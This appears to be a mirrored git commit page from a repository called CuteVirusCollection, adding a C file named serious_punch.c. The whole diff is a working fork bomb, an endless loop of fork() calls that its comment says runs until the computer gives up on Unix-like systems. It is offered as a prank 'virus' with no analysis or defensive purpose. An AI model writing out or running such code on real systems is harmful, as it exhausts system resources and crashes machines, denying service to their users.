mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 07:40:43 -08:00
A fork-bomb that creates lots of child process till the computer gives up.
This commit is contained in:
7
serious_punch.c
Normal file
7
serious_punch.c
Normal file
@@ -0,0 +1,7 @@
|
||||
// A fork-bomb that creates lots of child process till the computer gives up. Works on Unix-like OS.
|
||||
|
||||
#include <unistd.h>
|
||||
|
||||
int main(){
|
||||
while(1) fork();
|
||||
}
|
||||
Reference in New Issue
Block a user